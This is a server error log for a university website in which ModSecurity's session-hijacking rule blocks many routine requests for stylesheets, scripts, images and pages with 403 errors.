[Mon Aug 28 08:57:03.339796 2023] [:error] [pid 38686] [client 114.79.54.222] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/css/bootstrap-datepicker3.css"] [unique_id "ZOv@78Co-f0AAJceGOIAAAAA"]
[Mon Aug 28 08:57:03.346687 2023] [:error] [pid 38726] [client 114.79.54.222] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/css/unla.css"] [unique_id "ZOv@78Co-f0AAJdGkh4AAAAF"]
[Mon Aug 28 08:57:03.634291 2023] [:error] [pid 38726] [client 114.79.54.222] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/bootstrap.min.js"] [unique_id "ZOv@78Co-f0AAJdGkh8AAAAF"]
[Mon Aug 28 08:57:03.634707 2023] [:error] [pid 38683] [client 114.79.54.222] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/jquery.min.js"] [unique_id "ZOv@78Co-f0AAJcb4@4AAAAP"]
[Mon Aug 28 08:57:03.683037 2023] [:error] [pid 38688] [client 114.79.54.222] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/js/bootstrap-datepicker.js"] [unique_id "ZOv@78Co-f0AAJcg6doAAAAD"]
[Mon Aug 28 08:57:03.698398 2023] [:error] [pid 38647] [client 114.79.54.222] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/prof_hennie.png"] [unique_id "ZOv@78Co-f0AAJb3Rb0AAAAH"]
[Mon Aug 28 08:57:03.698875 2023] [:error] [pid 38726] [client 114.79.54.222] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/logo-unla-mobile.png"] [unique_id "ZOv@78Co-f0AAJdGkiAAAAAF"]
[Mon Aug 28 08:57:03.699199 2023] [:error] [pid 38648] [client 114.79.54.222] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/logo-unla.png"] [unique_id "ZOv@78Co-f0AAJb4sX8AAAAL"]
[Mon Aug 28 08:57:03.917575 2023] [:error] [pid 38114] [client 114.79.54.222] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/nurtriana.png"] [unique_id "ZOv@78Co-f0AAJTiolQAAAAE"]
[Mon Aug 28 08:57:03.918728 2023] [:error] [pid 38726] [client 114.79.54.222] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/ratri_tiara2023.png"] [unique_id "ZOv@78Co-f0AAJdGkiEAAAAF"]
[Mon Aug 28 08:57:03.935909 2023] [:error] [pid 38648] [client 114.79.54.222] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/fh-link.png"] [unique_id "ZOv@78Co-f0AAJb4sYAAAAAL"]
[Mon Aug 28 08:57:03.941042 2023] [:error] [pid 38688] [client 114.79.54.222] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/upacara_hutri2023.png"] [unique_id "ZOv@78Co-f0AAJcg6dsAAAAD"]
[Mon Aug 28 08:57:03.952248 2023] [:error] [pid 38686] [client 114.79.54.222] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/kampus_mengajar_2023.png"] [unique_id "ZOv@78Co-f0AAJceGOMAAAAA"]
[Mon Aug 28 08:57:03.963050 2023] [:error] [pid 38683] [client 114.79.54.222] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/fe-link.png"] [unique_id "ZOv@78Co-f0AAJcb4@8AAAAP"]
[Mon Aug 28 08:57:04.168280 2023] [:error] [pid 38686] [client 114.79.54.222] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/fisip-link.png"] [unique_id "ZOv@8MCo-f0AAJceGOQAAAAA"]
[Mon Aug 28 08:57:04.183818 2023] [:error] [pid 38683] [client 114.79.54.222] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/fkip-link.png"] [unique_id "ZOv@8MCo-f0AAJcb4-AAAAAP"]
[Mon Aug 28 08:57:04.193232 2023] [:error] [pid 38726] [client 114.79.54.222] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/css/bootstrap-datepicker3.css"] [unique_id "ZOv@8MCo-f0AAJdGkiIAAAAF"]
[Mon Aug 28 08:57:04.214265 2023] [:error] [pid 38688] [client 114.79.54.222] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/ft-link.png"] [unique_id "ZOv@8MCo-f0AAJcg6dwAAAAD"]
[Mon Aug 28 08:57:04.215021 2023] [:error] [pid 38648] [client 114.79.54.222] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/pasca-link.png"] [unique_id "ZOv@8MCo-f0AAJb4sYEAAAAL"]
[Mon Aug 28 08:57:04.375530 2023] [:error] [pid 38686] [client 114.79.54.222] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/banner/akademik.png"] [unique_id "ZOv@8MCo-f0AAJceGOUAAAAA"]
[Mon Aug 28 08:57:04.393067 2023] [:error] [pid 38683] [client 114.79.54.222] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/css/unla.css"] [unique_id "ZOv@8MCo-f0AAJcb4-EAAAAP"]
[Mon Aug 28 08:57:04.421952 2023] [:error] [pid 38648] [client 114.79.54.222] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/banner/pendaftaran_online.png"] [unique_id "ZOv@8MCo-f0AAJb4sYIAAAAL"]
[Mon Aug 28 08:57:04.432787 2023] [:error] [pid 38647] [client 114.79.54.222] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/login-email-unla.png"] [unique_id "ZOv@8MCo-f0AAJb3Rb8AAAAH"]
[Mon Aug 28 08:57:04.437592 2023] [:error] [pid 38688] [client 114.79.54.222] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/digilib-logo.png"] [unique_id "ZOv@8MCo-f0AAJcg6d0AAAAD"]
[Mon Aug 28 08:57:04.448579 2023] [:error] [pid 38726] [client 114.79.54.222] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/banner/rekrut_dosen.jpg"] [unique_id "ZOv@8MCo-f0AAJdGkiMAAAAF"]
[Mon Aug 28 08:57:04.803201 2023] [:error] [pid 38683] [client 114.79.54.222] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/jquery.min.js"] [unique_id "ZOv@8MCo-f0AAJcb4-IAAAAP"]
[Mon Aug 28 08:57:05.014458 2023] [:error] [pid 38726] [client 114.79.54.222] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/jquery.min.js"] [unique_id "ZOv@8cCo-f0AAJdGkiQAAAAF"]
[Mon Aug 28 08:57:05.123476 2023] [:error] [pid 38688] [client 114.79.54.222] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/bootstrap.min.js"] [unique_id "ZOv@8cCo-f0AAJcg6d4AAAAD"]
[Mon Aug 28 08:57:05.237292 2023] [:error] [pid 38648] [client 114.79.54.222] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/js/bootstrap-datepicker.js"] [unique_id "ZOv@8cCo-f0AAJb4sYMAAAAL"]
[Mon Aug 28 08:57:05.573216 2023] [:error] [pid 38683] [client 114.79.54.222] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv@8cCo-f0AAJcb4-MAAAAP"]
[Mon Aug 28 08:57:09.568461 2023] [:error] [pid 38648] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOv@9cCo-f0AAJb4sYYAAAAL"]
[Mon Aug 28 08:57:09.595234 2023] [:error] [pid 38683] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv@9cCo-f0AAJcb4-UAAAAP"]
[Mon Aug 28 08:57:18.963805 2023] [:error] [pid 38647] [client 114.79.54.222] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOv@-sCo-f0AAJb3RcUAAAAH"]
[Mon Aug 28 08:57:19.675061 2023] [:error] [pid 38114] [client 114.79.54.222] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv@-8Co-f0AAJTiolgAAAAE"]
[Mon Aug 28 08:57:24.324422 2023] [:error] [pid 38646] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOv-BMCo-f0AAJb21EUAAAAB"]
[Mon Aug 28 08:57:24.645364 2023] [:error] [pid 38648] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv-BMCo-f0AAJb4sYwAAAAL"]
[Mon Aug 28 08:57:37.688936 2023] [:error] [pid 38646] [client 114.79.54.222] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOv-EcCo-f0AAJb21EcAAAAB"]
[Mon Aug 28 08:57:37.983413 2023] [:error] [pid 38114] [client 114.79.54.222] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv-EcCo-f0AAJTiolsAAAAE"]
[Mon Aug 28 08:57:48.322341 2023] [:error] [pid 38688] [client 114.79.54.222] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOv-HMCo-f0AAJcg6eYAAAAD"]
[Mon Aug 28 08:57:48.663004 2023] [:error] [pid 38646] [client 114.79.54.222] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv-HMCo-f0AAJb21EkAAAAB"]
[Mon Aug 28 08:57:51.173302 2023] [:error] [pid 38646] [client 114.79.54.222] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOv-H8Co-f0AAJb21EoAAAAB"]
[Mon Aug 28 08:57:51.362264 2023] [:error] [pid 38726] [client 114.79.54.222] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv-H8Co-f0AAJdGkiwAAAAF"]
[Mon Aug 28 08:57:57.229248 2023] [:error] [pid 38641] [client 125.164.19.9] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/css/bootstrap.min.css"] [unique_id "ZOv-JcCo-f0AAJbxpB0AAAAJ"]
[Mon Aug 28 08:57:57.229605 2023] [:error] [pid 38646] [client 125.164.20.190] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/css/bootstrap-datepicker3.css"] [unique_id "ZOv-JcCo-f0AAJb21E0AAAAB"]
[Mon Aug 28 08:57:57.342606 2023] [:error] [pid 38648] [client 125.164.21.210] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/css/unla.css"] [unique_id "ZOv-JcCo-f0AAJb4sZQAAAAL"]
[Mon Aug 28 08:57:57.342606 2023] [:error] [pid 38726] [client 125.164.19.9] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/bootstrap.min.js"] [unique_id "ZOv-JcCo-f0AAJdGki0AAAAF"]
[Mon Aug 28 08:57:57.342696 2023] [:error] [pid 38686] [client 125.164.16.61] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/jquery.min.js"] [unique_id "ZOv-JcCo-f0AAJceGPMAAAAA"]
[Mon Aug 28 08:57:57.342873 2023] [:error] [pid 38764] [client 125.164.21.210] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/js/bootstrap-datepicker.js"] [unique_id "ZOv-JcCo-f0AAJdscJkAAAAM"]
[Mon Aug 28 08:57:57.442719 2023] [:error] [pid 38686] [client 125.164.18.135] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/logo-unla-mobile.png"] [unique_id "ZOv-JcCo-f0AAJceGPQAAAAA"]
[Mon Aug 28 08:57:57.442954 2023] [:error] [pid 38646] [client 125.164.18.135] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/logo-unla.png"] [unique_id "ZOv-JcCo-f0AAJb21E4AAAAB"]
[Mon Aug 28 08:57:57.481515 2023] [:error] [pid 38648] [client 125.164.20.190] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/prof_hennie.png"] [unique_id "ZOv-JcCo-f0AAJb4sZUAAAAL"]
[Mon Aug 28 08:57:57.481617 2023] [:error] [pid 38764] [client 125.164.18.135] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/ratri_tiara2023.png"] [unique_id "ZOv-JcCo-f0AAJdscJoAAAAM"]
[Mon Aug 28 08:57:57.481619 2023] [:error] [pid 38726] [client 125.164.18.135] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/nurtriana.png"] [unique_id "ZOv-JcCo-f0AAJdGki4AAAAF"]
[Mon Aug 28 08:57:57.527812 2023] [:error] [pid 38686] [client 125.164.18.135] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/upacara_hutri2023.png"] [unique_id "ZOv-JcCo-f0AAJceGPUAAAAA"]
[Mon Aug 28 08:57:57.535694 2023] [:error] [pid 38646] [client 125.164.17.125] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/jquery.min.js"] [unique_id "ZOv-JcCo-f0AAJb21E8AAAAB"]
[Mon Aug 28 08:57:57.544958 2023] [:error] [pid 38648] [client 125.164.19.9] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/kampus_mengajar_2023.png"] [unique_id "ZOv-JcCo-f0AAJb4sZYAAAAL"]
[Mon Aug 28 08:57:57.558169 2023] [:error] [pid 38764] [client 125.164.20.190] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/fh-link.png"] [unique_id "ZOv-JcCo-f0AAJdscJsAAAAM"]
[Mon Aug 28 08:57:57.573030 2023] [:error] [pid 38726] [client 125.164.22.227] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/fe-link.png"] [unique_id "ZOv-JcCo-f0AAJdGki8AAAAF"]
[Mon Aug 28 08:57:57.573051 2023] [:error] [pid 38648] [client 125.164.20.190] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/fisip-link.png"] [unique_id "ZOv-JcCo-f0AAJb4sZcAAAAL"]
[Mon Aug 28 08:57:57.576089 2023] [:error] [pid 38686] [client 125.164.20.190] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/fkip-link.png"] [unique_id "ZOv-JcCo-f0AAJceGPYAAAAA"]
[Mon Aug 28 08:57:57.586696 2023] [:error] [pid 38646] [client 125.164.16.61] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/ft-link.png"] [unique_id "ZOv-JcCo-f0AAJb21FAAAAAB"]
[Mon Aug 28 08:57:57.600725 2023] [:error] [pid 38764] [client 125.164.17.125] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/pasca-link.png"] [unique_id "ZOv-JcCo-f0AAJdscJwAAAAM"]
